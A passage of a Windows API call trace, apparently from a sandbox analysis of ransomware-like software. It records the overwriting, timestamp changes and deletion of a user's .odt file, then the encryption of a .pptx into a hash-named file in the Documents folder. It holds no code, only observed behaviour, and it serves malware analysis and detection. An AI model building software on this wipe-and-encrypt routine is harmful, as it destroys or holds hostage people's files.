nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.266] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.267] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.267] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.268] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.269] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.270] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.271] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.271] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.272] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.273] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.274] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.274] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.275] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.276] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.277] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.277] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.278] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.279] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0075.279] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.280] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.280] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.281] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.282] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.283] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.283] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.284] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.285] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.299] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.300] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.301] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.301] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.302] SetEndOfFile (hFile=0x36c) returned 1 [0075.303] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.303] CloseHandle (hObject=0x36c) returned 1 [0075.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.303] GetFileType (hFile=0x36c) returned 0x1 [0075.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.303] GetFileType (hFile=0x36c) returned 0x1 [0075.303] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.303] CloseHandle (hObject=0x36c) returned 1 [0075.304] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.304] GetFileType (hFile=0x36c) returned 0x1 [0075.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.304] GetFileType (hFile=0x36c) returned 0x1 [0075.304] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.304] CloseHandle (hObject=0x36c) returned 1 [0075.304] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.304] GetFileType (hFile=0x36c) returned 0x1 [0075.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.304] GetFileType (hFile=0x36c) returned 0x1 [0075.304] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.304] CloseHandle (hObject=0x36c) returned 1 [0075.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.305] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt")) returned 1 [0075.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", lpFilePart=0x0) returned 0x48 [0075.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dc8140939c1716cd9057578cfa7bc25"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.306] GetFileType (hFile=0x36c) returned 0x1 [0075.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.306] GetFileType (hFile=0x36c) returned 0x1 [0075.306] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.306] CloseHandle (hObject=0x36c) returned 1 [0075.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", lpFilePart=0x0) returned 0x48 [0075.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dc8140939c1716cd9057578cfa7bc25"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.306] GetFileType (hFile=0x36c) returned 0x1 [0075.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.306] GetFileType (hFile=0x36c) returned 0x1 [0075.306] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.306] CloseHandle (hObject=0x36c) returned 1 [0075.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", lpFilePart=0x0) returned 0x48 [0075.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dc8140939c1716cd9057578cfa7bc25"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.307] GetFileType (hFile=0x36c) returned 0x1 [0075.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.307] GetFileType (hFile=0x36c) returned 0x1 [0075.307] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.307] CloseHandle (hObject=0x36c) returned 1 [0075.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.307] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.308] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x21815d8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.308] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.308] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.308] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21816c8, pdwDataLen=0x1bf5db30 | out: pbData=0x21816c8*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.308] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x21817e8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.308] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.308] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.308] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626f30) returned 1 [0075.308] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.309] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x4, pbData=0x2181930*=0x1, dwFlags=0x0) returned 1 [0075.309] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x1, pbData=0x21818e0, dwFlags=0x0) returned 1 [0075.309] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.309] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0075.309] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx", lpFilePart=0x0) returned 0x33 [0075.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nVOK D.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nvok d.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.309] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", lpFilePart=0x0) returned 0x48 [0075.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\58711d0fa3a3435660c842996474bea2"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.310] ReadFile (in: hFile=0x36c, lpBuffer=0x2181cd0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2181cd0*, lpNumberOfBytesRead=0x1bf5da28*=0xe36f, lpOverlapped=0x0) returned 1 [0075.311] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2195ce8*, pdwDataLen=0x1bf5da80*=0xe360, dwBufLen=0xe360 | out: pbData=0x2195ce8*, pdwDataLen=0x1bf5da80*=0xe360) returned 1 [0075.314] ReadFile (in: hFile=0x36c, lpBuffer=0x2181cd0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2181cd0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.314] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21a4088*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x21a4088*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.314] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21a40d8*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x21a40d8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.314] WriteFile (in: hFile=0x358, lpBuffer=0x21a4128*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x21a4128*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.314] CloseHandle (hObject=0x358) returned 1 [0075.316] CloseHandle (hObject=0x36c) returned 1 [0075.316] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.316] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0075.316] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0075.316] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2", lpFilePart=0x0) returned 0x48 [0075.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\58711D0FA3A3435660C842996474BEA2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\58711d0fa3a3435660c842996474bea2"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.316] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.318] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.319] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.320] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] ReadFile (in: hFile=0x36c, lpBuffer=0x21a5820, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21a5820*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 